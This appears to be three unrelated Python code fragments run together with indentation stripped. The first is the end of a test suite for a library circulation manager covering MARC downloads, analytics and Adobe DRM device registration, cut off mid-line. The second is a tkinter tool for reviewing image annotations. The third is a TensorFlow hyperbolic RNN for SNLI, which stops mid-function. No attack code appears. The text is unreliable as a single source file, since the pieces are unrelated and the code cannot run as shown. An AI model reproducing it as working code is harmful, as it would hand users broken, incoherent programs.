media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=now)
cache, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=None,
representation=rep, end_time=now)
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert "No MARC exporter is currently configured" in html
assert '<h3>All Books</h3>' in html
assert '<a href="http://mirror1">Full file - last updated %s</a>' % now.strftime("%B %-d, %Y") in html
class TestAnalyticsController(CirculationControllerTest):
def setup(self):
super(TestAnalyticsController, self).setup()
[self.lp] = self.english_1.license_pools
self.identifier = self.lp.identifier
def test_track_event(self):
integration, ignore = create(
self._db, ExternalIntegration,
goal=ExternalIntegration.ANALYTICS_GOAL,
protocol="core.local_analytics_provider",
)
integration.setting(
LocalAnalyticsProvider.LOCATION_SOURCE
).value = LocalAnalyticsProvider.LOCATION_SOURCE_NEIGHBORHOOD
self.manager.analytics = Analytics(self._db)
with self.request_context_with_library("/"):
response = self.manager.analytics_controller.track_event(self.identifier.type, self.identifier.identifier, "invalid_type")
eq_(400, response.status_code)
eq_(INVALID_ANALYTICS_EVENT_TYPE.uri, response.uri)
# If there is no active patron, or if the patron has no
# associated neighborhood, the CirculationEvent is created
# with no location.
patron = self._patron()
for request_patron in (None, patron):
with self.request_context_with_library("/"):
flask.request.patron = request_patron
response = self.manager.analytics_controller.track_event(
self.identifier.type, self.identifier.identifier,
"open_book"
)
eq_(200, response.status_code)
circulation_event = get_one(
self._db, CirculationEvent,
type="open_book",
license_pool=self.lp
)
eq_(None, circulation_event.location)
self._db.delete(circulation_event)
# If the patron has an associated neighborhood, and the
# analytics controller is set up to use patron neighborhood as
# event location, then the CirculationEvent is created with
# that neighborhood as its location.
patron.neighborhood = "Mars Grid 4810579"
with self.request_context_with_library("/"):
flask.request.patron = patron
response = self.manager.analytics_controller.track_event(
self.identifier.type, self.identifier.identifier, "open_book"
)
eq_(200, response.status_code)
circulation_event = get_one(
self._db, CirculationEvent,
type="open_book",
license_pool=self.lp
)
eq_(patron.neighborhood, circulation_event.location)
self._db.delete(circulation_event)
class TestDeviceManagementProtocolController(ControllerTest):
def setup(self):
super(TestDeviceManagementProtocolController, self).setup()
self.initialize_adobe(self.library, self.libraries)
self.auth = dict(Authorization=self.valid_auth)
# Since our library doesn't have its Adobe configuration
# enabled, the Device Management Protocol controller has not
# been enabled.
eq_(None, self.manager.adobe_device_management)
# Set up the Adobe configuration for this library and
# reload the CirculationManager configuration.
self.manager.setup_adobe_vendor_id(self._db, self.library)
self.manager.load_settings()
# Now the controller is enabled and we can use it in this
# test.
self.controller = self.manager.adobe_device_management
def _create_credential(self):
"""Associate a credential with the default patron which
can have Adobe device identifiers associated with it,
"""
return self._credential(
DataSource.INTERNAL_PROCESSING,
AuthdataUtility.ADOBE_ACCOUNT_ID_PATRON_IDENTIFIER,
self.default_patron
)
def test_link_template_header(self):
"""Test the value of the Link-Template header used in
device_id_list_handler.
"""
with self.request_context_with_library("/"):
headers = self.controller.link_template_header
eq_(1, len(headers))
template = headers['Link-Template']
expected_url = url_for("adobe_drm_device", library_short_name=self.library.short_name, device_id="{id}", _external=True)
expected_url = expected_url.replace("%7Bid%7D", "{id}")
eq_('<%s>; rel="item"' % expected_url, template)
def test__request_handler_failure(self):
"""You cannot create a DeviceManagementRequestHandler
without providing a patron.
"""
result = self.controller._request_handler(None)
assert isinstance(result, ProblemDetail)
eq_(INVALID_CREDENTIALS.uri, result.uri)
eq_("No authenticated patron", result.detail)
def test_device_id_list_handler_post_success(self):
# The patron has no credentials, and thus no registered devices.
eq_([], self.default_patron.credentials)
headers = dict(self.auth)
headers['Content-Type'] = self.controller.DEVICE_ID_LIST_MEDIA_TYPE
with self.request_context_with_library(
"/", method='POST', headers=headers, data="device"
):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
eq_(200, response.status_code)
# We just registered a new device with the patron. This
# automatically created an appropriate Credential for
# them.
[credential] = self.default_patron.credentials
eq_(DataSource.INTERNAL_PROCESSING, credential.data_source.name)
eq_(AuthdataUtility.ADOBE_ACCOUNT_ID_PATRON_IDENTIFIER,
credential.type)
eq_(['device'],
[x.device_identifier for x in credential.drm_device_identifiers]
)
def test_device_id_list_handler_get_success(self):
credential = self._create_credential()
credential.register_drm_device_identifier("device1")
credential.register_drm_device_identifier("device2")
with self.request_context_with_library("/", headers=self.auth):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
eq_(200, response.status_code)
# We got a list of device IDs.
eq_(self.controller.DEVICE_ID_LIST_MEDIA_TYPE,
response.headers['Content-Type'])
eq_("device1\ndevice2", response.data)
# We got a URL Template (see test_link_template_header())
# that explains how to address any particular device ID.
expect = self.controller.link_template_header
for k, v in expect.items():
assert response.headers[k] == v
def test_device_id_list_handler_bad_auth(self):
with self.request_context_with_library("/"):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
assert isinstance(response, ProblemDetail)
eq_(401, response.status_code)
def test_device_id_list_handler_bad_method(self):
with self.request_context_with_library(
"/", method='DELETE', headers=self.auth
):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
assert isinstance(response, ProblemDetail)
eq_(405, response.status_code)
def test_device_id_list_handler_too_many_simultaneous_registrations(self):
"""We only allow registration of one device ID at a time."""
headers = dict(self.auth)
headers['Content-Type'] = self.controller.DEVICE_ID_LIST_MEDIA_TYPE
with self.request_context_with_library(
"/", method='POST', headers=headers, data="device1\ndevice2"
):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
eq_(413, response.status_code)
eq_("You | |
import glob
import os
import sys
import tkinter as tk
from tkinter import messagebox
from xml.etree import ElementTree
import cv2
import numpy as np
import pandas as pd
from PIL import Image, ImageTk
from utils import annotator
FOLDER_PATH = 'purifier/folders.pkl'
def get_folders():
"""
read all trial folders and return a dataframe
:return: dataframe
"""
# get the list of all folders
folders_path = sorted(glob.glob("data/Original-data/belvedere/*"))
# Create a dict to hold the number of invalid images per folder
f_dic = {}
for path in folders_path:
f_dic[path] = 0
# Get the invalid images
# invalid_images = glob.glob("data/Original-data/*/*/*.jpg_")
# loop over all invalid images and +1 to the folder
# for img in invalid_images:
# t = img.split("/")
# f_path = '/'.join(t[:-1])
# f_dic[f_path] += 1
# make a dataframe from the dict
# f_list = [[k, v] for k, v in f_dic.items()]
folder_df = pd.DataFrame(data=folders_path, columns=["folder"])
folder_df["checked"] = False
#
# folder_df = folder_df.sort_values(["invalids"], ascending=False)
# folder_df.reset_index(inplace=True)
folder_df.to_pickle(FOLDER_PATH)
for i, row in folder_df.iterrows():
print(row.folder)
return folder_df
def get_dataframe(_path):
"""
read images and their labels (XML files) from the given directory
:param _path: directory path
:return: a dataframe
"""
all_images = sorted(glob.glob(_path + "/*.bmp"))
all_xmls = sorted(glob.glob(_path + "/*.xml"))
data = []
for i, img in enumerate(all_images):
vals = read_xml(all_xmls[i])
# add image number to sort the dataframe based on it
name = img.split("/")[-1]
num = name.split(".")[0]
num = int(num[:-2])
data.append([img, vals[0], vals[1], vals[2], vals[3], vals[4], num])
df = pd.DataFrame(data=data, columns=["path", "xt", "yt", "wt", "ht", "angt", "num"])
df = df.sort_values(["num"])
df.reset_index(inplace=True)
df["status"] = 0
return df
def read_xml(xml_path):
e = ElementTree.parse(xml_path).getroot()
x = np.float32(e[0].text)
y = np.float32(e[1].text)
w = np.float32(e[2].text)
h = np.float32(e[3].text)
a = np.float32(e[4].text)
return [x, y, w, h, a]
def numpy2pil(np_array: np.ndarray) -> Image.Image:
"""
convert an HxWx3 numpy array into an RGB Image
:param np_array: input numpy array
:return: A PIL Image object
"""
assert_msg = "input shall be an HxWx3 ndarray"
assert isinstance(np_array, np.ndarray), assert_msg
assert np.ndim(np_array) == 3, assert_msg
assert np_array.shape[2] == 3, assert_msg
img = Image.fromarray(np_array, 'RGB')
return img
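# A minimal usage sketch (hedged: the array contents are arbitrary test data):
#
#   frame = np.zeros((64, 64, 3), dtype=np.uint8)  # black RGB frame
#   pil_img = numpy2pil(frame)
#   pil_img.size  # -> (64, 64)
#
# Note that Image.fromarray expects uint8 data for 'RGB' mode.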
class inspector_gui:
def __init__(self, master, data):
self.frame = tk.Frame(master)
self.frame.pack_propagate(0)
self.frame.pack(fill=tk.BOTH, expand=1)
# Folder index
self.f_idx = 0
self.folder_df = data
self.n_folders = len(data)
self.current_df = None
self.n_img = 0
self.current_df_dirty = False
# folder navigation
self.prev_folder_btn = tk.Button(self.frame, text="previous Folder", command=lambda: self.change_folder(-1))
self.prev_folder_btn.place(width=140, height=30, x=20, y=5)
self.path_lbl = tk.Label(self.frame, text="Image path: ", anchor=tk.CENTER)
self.path_lbl.place(width=380, height=20, x=200, y=5)
self.next_folder_btn = tk.Button(self.frame, text="next Folder", command=lambda: self.change_folder(1))
self.next_folder_btn.place(width=140, height=30, x=640, y=5)
# big labeled image
self.canvas = tk.Canvas(self.frame, width=576, height=576, bg="yellow")
self.canvas.place(width=576, height=576, x=12, y=40)
img = Image.open("0in.jpg")
self.photo = ImageTk.PhotoImage(img)
self.image_ref = self.canvas.create_image((288, 288), image=self.photo)
# thumbnail image
self.canvas_s = tk.Canvas(self.frame, width=192, height=192)
self.canvas_s.place(width=192, height=192, x=596, y=40)
self.photo_s = ImageTk.PhotoImage(img)
self.image_refs = self.canvas_s.create_image((96, 96), image=self.photo_s)
self.pager_lbl = tk.Label(self.frame, text="0/1234", anchor=tk.CENTER)
self.pager_lbl.place(width=192, height=20, x=596, y=225)
self.status_lbl = tk.Label(self.frame, text="0", anchor=tk.CENTER, font=("Courier", 34))
self.status_lbl.place(width=192, height=40, x=596, y=255)
# true false buttons
self.incorrect_btn = tk.Button(self.frame, text="Incorrect (i)", bg="red", command=lambda: self.updateDF(2))
self.incorrect_btn.place(width=80, height=40, x=610, y=410)
self.correct_btn = tk.Button(self.frame, text="correct (c)", bg="green", command=lambda: self.updateDF(1))
self.correct_btn.place(width=80, height=40, x=700, y=410)
# back and forward buttons for images
self.backButton = tk.Button(self.frame, text="<- back", command=lambda: self.updateIndex(-1))
self.backButton.place(width=80, height=30, x=610, y=470)
self.nextButton = tk.Button(self.frame, text="next ->", command=lambda: self.updateIndex(1))
self.nextButton.place(width=80, height=30, x=700, y=470)
# capture image and save dataframe buttons
self.capture_btn = tk.Button(self.frame, text="Capture (p)", command=self.capture)
self.capture_btn.place(width=80, height=30, x=610, y=530)
self.save_btn = tk.Button(self.frame, text="save", command=self.saveDF)
self.save_btn.place(width=80, height=30, x=700, y=530)
# export and rename buttons
self.export_btn = tk.Button(self.frame, text="export path", command=self.exportPath)
self.export_btn.place(width=80, height=30, x=700, y=580)
self.rename_btn = tk.Button(self.frame, text="rename path", command=self.file_renamer)
self.rename_btn.place(width=80, height=30, x=610, y=580)
# bind events with keyboard
master.bind('<Left>', self.leftKey)
master.bind('<Right>', self.rightKey)
master.bind('i', self.incorrectKey)
master.bind('c', self.correctKey)
master.bind('p', self.captureKey)
# select the first folder as start point
self.goto_folder(0)
def rightKey(self, event):
self.updateIndex(1)
def leftKey(self, event):
self.updateIndex(-1)
def correctKey(self, event):
self.updateDF(1)
def incorrectKey(self, event):
self.updateDF(2)
def captureKey(self, event):
self.capture()
def findNextIndex(self):
"""
Return the index of the first row whose status is 0 (unreviewed).
If none remains, fall back to the first row with status 1;
if every row has been reviewed, switch folders via goto_folder.
:return: row index
"""
status_0 = self.current_df.index[self.current_df["status"] == 0].tolist()
status_0 = sorted(status_0)
if len(status_0) == 0:
status_1 = self.current_df.index[self.current_df["status"] == 1].tolist()
status_1 = sorted(status_1)
if len(status_1) == 0:
return self.goto_folder(1)
else:
return status_1[0]
else:
return status_0[0]
def capture(self):
row = self.current_df.iloc[self.img_index]
img = cv2.imread(row.path, cv2.IMREAD_GRAYSCALE)
truth = [row.xt, row.yt, row.wt, row.ht, row.angt]
# Update the labeled image
img = annotator((0, 250, 0), img, *truth) # Green
save_path = row.path.replace("/", "-")
cv2.imwrite("purifier/" + save_path, img)
def change_folder(self, val):
"""
update the folder index and clip it between 0 and n_folders
:param val: +1 go next, -1 go previous
:return: updated folder_idx
"""
if self.current_df_dirty:
res = messagebox.askquestion("Save Data", "Did you save the data?", icon='warning')
if res == 'no':
return
self.f_idx += val
self.f_idx = np.clip(self.f_idx, 0, self.n_folders - 1)
self.goto_folder(self.f_idx)
def goto_folder(self, idx):
"""
Get the path from the folder dataframe. If the upcoming folder already
has a pickled dataframe for its images, load it; otherwise create one.
:param idx: index of current folder to be shown
"""
# get the row of current path
row = self.folder_df.iloc[idx]
# check whether a dataframe already exists for this folder
df_name = row.folder.replace("/", "_")
df_path = "purifier/" + df_name + ".pkl"
if os.path.exists(df_path):
self.current_df = pd.read_pickle(df_path)
else:
# read all images and labels in current directory
self.current_df = get_dataframe(row.folder)
# reset the image index
self.img_index = self.findNextIndex()
self.n_img = len(self.current_df)
# update the folder name label
new_text = "{0}".format(row.folder)
self.path_lbl.configure(text=new_text)
self.current_df_dirty = False
# finally update GUI with new data
self.updateGUI()
def exportPath(self):
"""
export the paths of images flagged as incorrect
:return:
"""
incorrects = self.current_df[self.current_df.status == 2]
path_txt = []
# loop over rows and extract the paths
for i, row in incorrects.iterrows():
path_txt.append(row.path + "\n")
# save file
f_row = self.folder_df.iloc[self.f_idx]
export_path = f_row.folder + "/incorrects.txt"
open(export_path, mode='w').writelines(path_txt)
# corrects = self.df[self.df.status == 1]
# with open(CHECKED_PATH, mode='a') as f:
# for i, row in corrects.iterrows():
# path = row.trial + "/" + row.img_id + "\n"
# f.writelines(path)
messagebox.showinfo("Export path", "incorrect paths exported successfuly at {}".format(export_path))
def updateDF(self, val):
"""
update the status of current row and go to next image
:return:
"""
self.current_df.at[self.img_index, "status"] = val
r = self.current_df.iloc[self.img_index]
print("{0} has been marked as {1}".format(r.path, r.status))
self.current_df_dirty = True
self.updateIndex(1)
def saveDF(self):
"""
pickle the current dataframe (with its correct/incorrect flags) to disk
:return:
"""
# get the row of current path
row = self.folder_df.iloc[self.f_idx]
# check whether a dataframe already exists for this folder
df_name = row.folder.replace("/", "_")
df_path = "purifier/"+df_name+".pkl"
try:
self.current_df.to_pickle(df_path)
except IOError:
print("IO Error")
except RuntimeError:
print("RuntimeError")
except EOFError:
print("EOFError")
except OSError:
print("OSError")
except Exception:
print("Unexpected error:", sys.exc_info()[0])
self.current_df_dirty = False
messagebox.showinfo("save data", "Data saved successfuly at {}".format(df_path))
def updateIndex(self, val):
"""
update the image index, clip it between 0 and n_img - 1, then update the GUI
:param val:
:return:
"""
self.img_index += val
self.img_index = np.clip(self.img_index, 0, self.n_img - 1)
self.updateGUI()
def updateGUI(self):
"""
update the GUI based on img_index
:return:
"""
row = self.current_df.iloc[self.img_index]
# update pager
new_text = "{0}/{1}".format(self.img_index + 1, self.n_img)
self.pager_lbl.configure(text=new_text)
# update status
self.status_lbl.configure(text=str(row.status))
# update image holder
# load image
file = row.path.split(".")[0]
file = file + ".bmp"
img = cv2.imread(file, cv2.IMREAD_GRAYSCALE)
# update thumbnails before manipulation
s_img = np.asarray(img, dtype=np.uint8)
s_img = Image.fromarray(s_img, 'L')
self.photo_s = ImageTk.PhotoImage(image=s_img)
self.canvas_s.itemconfig(self.image_refs, image=self.photo_s)
# resize image 3x and put label on it
img = cv2.resize(img, (576, 576))
truth = [row.xt * 3, row.yt * 3, row.wt * 3, row.ht * 3, row.angt]
img = annotator((0, 250, 0), img, *truth) # Green
img = numpy2pil(img)
self.photo = ImageTk.PhotoImage(image=img)
self.canvas.itemconfig(self.image_ref, image=self.photo)
def file_renamer(self):
"""
Read the exported incorrects.txt for the current folder and rename each
mislabeled image/label pair by changing the extensions to jpg_ and xml_.
:return:
"""
f_row = self.folder_df.iloc[self.f_idx]
export_path = f_row.folder + "/incorrects.txt"
counter = 0
with open(export_path, mode='r') as f:
for line in f:
line = line.strip()
root = line.split(".")[0]
os.rename(root + ".jpg", root + ".jpg_")
xml = root.replace("in.", "gt.")
import os
import logging
import numpy as np
import tensorflow as tf
import pickle
import time
import random
import math
import matplotlib.pyplot as plt
from datetime import datetime
from random import shuffle
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
logging.getLogger("tensorflow").setLevel(logging.CRITICAL)
import util
import rnn_impl
cell_type = 'rnn'
geom = 'hyp'
hyp_opt = "rsgd"
lr_ffnn = 0.01
lr_words = 0.1
# batch_size = 64
dtype = tf.float64
# Project setup
num_classes = 2
word_to_id_file_path = os.path.join('snli_dataset/','word_to_id')
id_to_word_file_path = os.path.join('snli_dataset/','id_to_word')
suffix = '_' + str(num_classes) + 'class'
training_data_file_path = os.path.join('snli_dataset/','train' + suffix)
test_data_file_path = os.path.join('snli_dataset/', 'test' + suffix)
dev_data_file_path = os.path.join('snli_dataset/', 'dev' + suffix)
PROJ_EPS = 1e-5
util.PROJ_EPS = PROJ_EPS
dataset = "SNLI"
c_val = 1.0
# FFNN params: id/relu/tanh/sigmoid
cell_non_lin = 'id'
ffnn_non_lin = 'id'
word_init_avg_norm = 0.001
additional_features = "dsq"
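# 'dsq' appends the squared sentence distance d(s1, s2)^2 as an extra scaled
# bias term (b_ff_d) in the feed-forward layer built below; setting
# additional_features = '' disables that term.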
dropout = 1.0
sent_geom = geom
inputs_geom = geom
bias_geom = geom
ffnn_geom = geom
mlr_geom = geom
fix_biases = 'n'
fix_biases_str = ''
fix_matrices = 'n'
matrices_init_eye = 'n'
mat_str = ''
# Optimization params
burnin = 'n'
# L2 regularization
reg_beta = 0.0
if inputs_geom == 'hyp' or bias_geom == 'hyp' or ffnn_geom == 'hyp' or mlr_geom == 'hyp':
hyp_opt_str = hyp_opt + '_lrW' + str(lr_words) + '_lrFF' + str(lr_ffnn) + '_'
else:
hyp_opt_str = ''
if c_val != 1.0:
c_str = 'C' + str(c_val) + '_'
else:
c_str = ''
if dropout != 1.0:
drp_str = 'drp' + str(dropout) + '_'
else:
drp_str = ''
burnin_str = ''
if burnin == 'y':
burnin_str = 'burn' + str(burnin).lower()
reg_beta_str = ''
if reg_beta > 0.0:
reg_beta_str = 'reg' + str(reg_beta) + '_'
additional_features_str = additional_features
if additional_features != '':
additional_features_str = additional_features + '_'
now = datetime.now()
name_experiment = 'demo_colab_group_20'
logger = util.setup_logger(name_experiment+now.strftime("_%Y-%m%d-%Hh%Mm%Ss")+'.txt', logs_dir='logs/', also_stdout=True)
logger.info('PARAMS : ' + name_experiment)
class HyperbolicRNNModel:
def __init__(self, word_to_id, id_to_word, dim, batch_size, embeddings = None):
self.word_to_id = word_to_id
self.id_to_word = id_to_word
self.dim = dim
self.batch_size = batch_size
self.embeddings_np = None if embeddings is None else np.array(embeddings)
self.construct_placeholders()
self.construct_execution_graph()
def construct_placeholders(self):
self.label_placeholder = tf.placeholder(tf.int32,
shape=[self.batch_size],
name='label_placeholder')
self.word_ids_1 = tf.placeholder(tf.int32, shape=[self.batch_size, None],
name='word_ids_1_placeholder')
self.word_ids_2 = tf.placeholder(tf.int32, shape=[self.batch_size, None],
name='word_ids_2_placeholder')
self.num_words_1 = tf.placeholder(tf.int32, shape=[self.batch_size],
name='num_words_1_placeholder')
self.num_words_2 = tf.placeholder(tf.int32, shape=[self.batch_size],
name='num_words_2_placeholder')
self.burn_in_factor = tf.placeholder(dtype, name='burn_in_factor_placeholder')
self.dropout_placeholder = tf.placeholder(dtype, name='dropout_placeholder')
if self.embeddings_np is not None:
self.embeddings_placeholder = tf.placeholder(dtype, shape = self.embeddings_np.shape,
name = 'embeddings_placeholder')
###############################################################################################
def construct_execution_graph(self):
# Collect vars separately. Word embeddings are not used here.
eucl_vars = []
hyp_vars = []
################## word embeddings ###################
# Initialize word embeddings close to 0, to have average norm equal to word_init_avg_norm.
if self.embeddings_np is not None:
self.embeddings = tf.get_variable(name = 'embeddings',
dtype = dtype,
shape = self.embeddings_np.shape,
trainable = True,
initializer = tf.constant_initializer(self.embeddings_np))
else:
maxval = (3. * (word_init_avg_norm ** 2) / (2. * self.dim)) ** (1. / 3)
initializer = tf.random_uniform_initializer(minval=-maxval, maxval=maxval, dtype=dtype)
self.embeddings = tf.get_variable('embeddings',
dtype=dtype,
shape=[len(self.word_to_id), self.dim],
initializer=initializer)
if inputs_geom == 'eucl':
eucl_vars += [self.embeddings]
################## RNNs for sentence embeddings ###################
if cell_type == 'TFrnn':
assert sent_geom == 'eucl'
cell_class = lambda h_dim: tf.contrib.rnn.BasicRNNCell(h_dim)
elif cell_type == 'TFgru':
assert sent_geom == 'eucl'
cell_class = lambda h_dim: tf.contrib.rnn.GRUCell(h_dim)
elif cell_type == 'TFlstm':
assert sent_geom == 'eucl'
cell_class = lambda h_dim: tf.contrib.rnn.BasicLSTMCell(h_dim)
elif cell_type == 'rnn' and sent_geom == 'eucl':
cell_class = lambda h_dim: rnn_impl.EuclRNN(h_dim, dtype=dtype)
elif cell_type == 'gru' and sent_geom == 'eucl':
cell_class = lambda h_dim: rnn_impl.EuclGRU(h_dim, dtype=dtype)
elif cell_type == 'rnn' and sent_geom == 'hyp':
cell_class = lambda h_dim: rnn_impl.HypRNN(num_units=h_dim,
inputs_geom=inputs_geom,
bias_geom=bias_geom,
c_val=c_val,
non_lin=cell_non_lin,
fix_biases=fix_biases,
fix_matrices=fix_matrices,
matrices_init_eye=matrices_init_eye,
dtype=dtype)
elif cell_type == 'gru' and sent_geom == 'hyp':
cell_class = lambda h_dim: rnn_impl.HypGRU(num_units=h_dim,
inputs_geom=inputs_geom,
bias_geom=bias_geom,
c_val=c_val,
non_lin=cell_non_lin,
fix_biases=fix_biases,
fix_matrices=fix_matrices,
matrices_init_eye=matrices_init_eye,
dtype=dtype)
else:
logger.error('Invalid cell type %s for sent_geom %s' % (cell_type, sent_geom))
exit()
# RNN 1
with tf.variable_scope(cell_type + '1'):
word_embeddings_1 = tf.nn.embedding_lookup(self.embeddings, self.word_ids_1) # bs x num_w_s1 x dim
cell_1 = cell_class(self.dim)
initial_state_1 = cell_1.zero_state(self.batch_size, dtype)
outputs_1, state_1 = tf.nn.dynamic_rnn(cell=cell_1,
inputs=word_embeddings_1,
dtype=dtype,
initial_state=initial_state_1,
sequence_length=self.num_words_1)
if cell_type == 'TFlstm':
self.sent_1 = state_1[1]
else:
self.sent_1 = state_1
sent1_norm = util.tf_norm(self.sent_1)
# RNN 2
with tf.variable_scope(cell_type + '2'):
word_embeddings_2 = tf.nn.embedding_lookup(self.embeddings, self.word_ids_2)
# tf.summary.scalar('word_emb2', tf.reduce_mean(tf.norm(word_embeddings_2, axis=2)))
cell_2 = cell_class(self.dim)
initial_state_2 = cell_2.zero_state(self.batch_size, dtype)
outputs_2, state_2 = tf.nn.dynamic_rnn(cell=cell_2,
inputs=word_embeddings_2,
dtype=dtype,
initial_state=initial_state_2,
sequence_length=self.num_words_2)
if cell_type == 'TFlstm':
self.sent_2 = state_2[1]
else:
self.sent_2 = state_2
sent2_norm = util.tf_norm(self.sent_2)
tf.summary.scalar('RNN/word_emb1', tf.reduce_mean(tf.norm(word_embeddings_1, axis=2)))
tf.summary.scalar('RNN/sent1', tf.reduce_mean(sent1_norm))
tf.summary.scalar('RNN/sent2', tf.reduce_mean(sent2_norm))
eucl_vars += cell_1.eucl_vars + cell_2.eucl_vars
if sent_geom == 'hyp':
hyp_vars += cell_1.hyp_vars + cell_2.hyp_vars
## Compute d(s1, s2)
if sent_geom == 'eucl':
d_sq_s1_s2 = util.tf_euclid_dist_sq(self.sent_1, self.sent_2)
else:
d_sq_s1_s2 = util.tf_poinc_dist_sq(self.sent_1, self.sent_2, c = c_val)
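# For reference (assuming util.tf_poinc_dist_sq follows the standard
# Poincare-ball formula, as in Ganea et al., 2018), the curvature-c distance is
#   d_c(u, v) = (2 / sqrt(c)) * arctanh( sqrt(c) * ||(-u) (+)_c v|| ),
# where (+)_c denotes Mobius addition; the Euclidean branch above is simply
# the squared distance ||s1 - s2||^2.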
##### Some summaries:
# For summaries and debugging, we need these:
pos_labels = tf.reshape(tf.cast(self.label_placeholder, tf.float64), [-1, 1])
neg_labels = 1. - pos_labels
weights_pos_labels = pos_labels / tf.reduce_sum(pos_labels)
weights_neg_labels = neg_labels / tf.reduce_sum(neg_labels)
################## first feed forward layer ###################
# Define variables for the first feed-forward layer: W1 * s1 + W2 * s2 + b + bd * d(s1,s2)
W_ff_s1 = tf.get_variable('W_ff_s1',
dtype=dtype,
shape=[self.dim, self.dim],
initializer= tf.contrib.layers.xavier_initializer())
W_ff_s2 = tf.get_variable('W_ff_s2',
dtype=dtype,
shape=[self.dim, self.dim],
initializer= tf.contrib.layers.xavier_initializer())
b_ff = tf.get_variable('b_ff',
dtype=dtype,
shape=[1, self.dim],
initializer=tf.constant_initializer(0.0))
b_ff_d = tf.get_variable('b_ff_d',
dtype=dtype,
shape=[1, self.dim],
initializer=tf.constant_initializer(0.0))
eucl_vars += [W_ff_s1, W_ff_s2]
if ffnn_geom == 'eucl' or bias_geom == 'eucl':
eucl_vars += [b_ff]
if additional_features == 'dsq':
eucl_vars += [b_ff_d]
else:
hyp_vars += [b_ff]
if additional_features == 'dsq':
hyp_vars += [b_ff_d]
if ffnn_geom == 'eucl' and sent_geom == 'hyp': # Log-map hyperbolic sentence embeddings to the tangent space at 0 so the FFNN is Euclidean; d_sq_s1_s2 computed above keeps its original geometry.
self.sent_1 = util.tf_log_map_zero(self.sent_1, c_val)
self.sent_2 = util.tf_log_map_zero(self.sent_2, c_val)
####### Build output_ffnn #######
if ffnn_geom == 'eucl':
output_ffnn = tf.matmul(self.sent_1, W_ff_s1) + tf.matmul(self.sent_2, W_ff_s2) + b_ff
if additional_features == 'dsq': # [u, v, d(u,v)^2]
output_ffnn = output_ffnn + d_sq_s1_s2 * b_ff_d
else:
assert sent_geom == 'hyp'
ffnn_s1 = util.tf_mob_mat_mul(W_ff_s1, self.sent_1, c_val)
ffnn_s2 = util.tf_mob_mat_mul(W_ff_s2, self.sent_2, c_val)
output_ffnn = util.tf_mob_add(ffnn_s1, ffnn_s2, c_val)
hyp_b_ff = b_ff
if bias_geom == 'eucl':
hyp_b_ff = util.tf_exp_map_zero(b_ff, c_val)
output_ffnn = util.tf_mob_add(output_ffnn, hyp_b_ff, c_val)
if additional_features == 'dsq': # [u, v, d(u,v)^2]
hyp_b_ff_d = b_ff_d
if bias_geom == 'eucl':
hyp_b_ff_d = util.tf_exp_map_zero(b_ff_d, c_val)
output_ffnn = util.tf_mob_add(output_ffnn,
util.tf_mob_scalar_mul(d_sq_s1_s2, hyp_b_ff_d, c_val),
c_val)
if ffnn_geom == 'eucl':
output_ffnn = util.tf_eucl_non_lin(output_ffnn, non_lin=ffnn_non_lin)
else:
output_ffnn = util.tf_hyp_non_lin(output_ffnn,
non_lin=ffnn_non_lin,
hyp_output = (mlr_geom == 'hyp' and dropout == 1.0),
c=c_val)
# Dropout (applied in the Euclidean/tangent representation, mapped back below if needed)
if dropout < 1.0:
# If we are here, then output_ffnn should be Euclidean.
output_ffnn = tf.nn.dropout(output_ffnn, keep_prob=self.dropout_placeholder)
if (mlr_geom == 'hyp'):
output_ffnn = util.tf_exp_map_zero(output_ffnn, c_val)
################## MLR ###################
# output_ffnn is self.batch_size x self.dim
A_mlr = []
P_mlr = []
logits_list = []
for cl in range(num_classes):
A_mlr.append(tf.get_variable('A_mlr' + str(cl),
dtype=dtype,
shape=[1, self.dim],
initializer=tf.contrib.layers.xavier_initializer()))
eucl_vars += [A_mlr[cl]]
P_mlr.append(tf.get_variable('P_mlr' + str(cl),
dtype=dtype,
shape=[1, self.dim],
initializer=tf.constant_initializer(0.0)))
if mlr_geom == 'eucl':
eucl_vars += [P_mlr[cl]]
logits_list.append(tf.reshape(util.tf_dot(-P_mlr[cl] + output_ffnn, A_mlr[cl]), [-1]))
elif mlr_geom == 'hyp':
hyp_vars += [P_mlr[cl]]
minus_p_plus_x = util.tf_mob_add(-P_mlr[cl], output_ffnn, c_val)
norm_a = util.tf_norm(A_mlr[cl])
lambda_px = util.tf_lambda_x(minus_p_plus_x, c_val)
px_dot_a = util.tf_dot(minus_p_plus_x, tf.nn.l2_normalize(A_mlr[cl]))
logit = 2. / np.sqrt(c_val) * norm_a * tf.asinh(np.sqrt(c_val) * px_dot_a * lambda_px)
logits_list.append(tf.reshape(logit, [-1]))
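# This branch matches the hyperbolic multinomial logistic regression of
# Ganea et al. (2018): with class offset p_k and normal a_k,
#   logit_k(x) = (2/sqrt(c)) * ||a_k|| *
#                asinh( sqrt(c) * <(-p_k) (+)_c x, a_k/||a_k||> * lambda_c((-p_k) (+)_c x) ),
# which recovers the Euclidean score <x - p_k, a_k> as c -> 0.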
self.logits = tf.stack(logits_list, axis=1)
self.argmax_idx = tf.argmax(self.logits, axis=1, output_type=tf.int32)
self.loss = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.label_placeholder,
logits=self.logits))
tf.summary.scalar('classif/unreg_loss', self.loss)
if reg_beta > 0.0:
assert num_classes == 2
distance_regularizer = tf.reduce_mean(
(tf.cast(self.label_placeholder, dtype=dtype) - 0.5) * d_sq_s1_s2)
self.loss = self.loss + reg_beta * distance_regularizer
self.acc = tf.reduce_mean(tf.to_float(tf.equal(self.argmax_idx, self.label_placeholder)))
tf.summary.scalar('classif/accuracy', self.acc)
######################################## OPTIMIZATION ######################################
all_updates_ops = []
###### Update Euclidean parameters using Adam.
optimizer_euclidean_params = tf.train.AdamOptimizer(learning_rate=1e-3)
eucl_grads = optimizer_euclidean_params.compute_gradients(self.loss, eucl_vars)
capped_eucl_gvs = [(tf.clip_by_norm(grad, 1.), var) for grad, var in eucl_grads] ###### Clip gradients
